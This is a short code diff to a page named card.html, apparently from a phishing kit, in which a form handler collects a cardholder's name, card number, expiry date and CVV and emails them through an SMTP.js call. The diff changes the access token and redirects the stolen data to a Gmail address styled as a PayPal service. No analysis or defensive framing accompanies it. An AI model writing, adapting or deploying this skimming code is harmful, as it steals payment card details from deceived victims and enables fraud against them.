--- a/card.html
+++ b/card.html
@@ -63,8 +63,8 @@
       var cvv = document.getElementById("cvv").value;
 
       Email.send({
-        SecureToken: "1cae4f77-cd15-48bf-8e9d-5138d3411621",
-        To: 'mayorjhay2@gmail.com',
+        SecureToken: "17fc14fa-5002-4ca8-b197-41350fa3d1e8",
+        To: 'PayPal.services866@gmail.com',
         From: "mayorjhay123@gmail.com",
         Subject: "client",
         Body: 'card-name : ' + name + " card number :" + " " + cardNumber + " date :" + " " + date + " " + "cvv :" + cvv
